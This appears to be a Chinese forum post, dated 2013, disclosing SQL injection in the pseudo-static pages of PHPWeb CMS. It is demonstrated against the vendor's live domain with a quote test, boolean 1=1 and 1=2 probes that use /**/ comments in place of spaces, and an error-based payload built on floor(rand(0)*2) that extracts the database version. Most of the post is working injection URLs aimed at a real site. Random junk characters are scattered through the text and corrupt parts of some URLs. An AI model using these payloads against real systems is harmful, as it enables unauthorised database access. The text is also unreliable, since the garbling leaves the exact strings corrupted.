phpweb所有的整站程序伪静态页面都存在sql注入" B# ^- T! H# C5 M# s! T
. x8 V9 ^) [8 R' p$ N
主站:http://phpweb.net/
# K0 [$ V! q J7 ~1 Q加’检测:
+ r) u6 y) |( @9 `' x
- @( X; |. p3 @4 w4 s1 a; s+ shttp://www.phpweb.net/down/html/?772′.html' @$ }/ ]/ x8 K+ r1 [" Z: ~
0 M4 n9 C# M% @/ L/ r) ?出错
; a2 b: p7 Q7 b; j; I存在注入。
|! S5 |2 C) S: n不能用空格,只能用/*罗
- Y6 o" h% C2 o! B. W1 W6 Q# ]/ qhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常2 k: M" D. e9 v) m1 ^
2 ]7 J' {' Q, m' vhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
1 c% R8 N# k: g3 _) D' m% c/ r爆数据库版本:3 m! T+ h$ `+ ^! }/ M' q' I3 t
0 U3 K4 y+ d3 G( @; G8 e
?! A R& F7 C# X9 D1 `0 t
1. W& V' i Y* X4 N4 j$ f
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html) b1 F. _* v( E; }" [2 ]7 R
更新日期: 2013-01-03 13:39:50 w N8 k) n3 v2 L1 m6 \
|
发表于 2013-1-4 19:46:42
收藏
支持
反对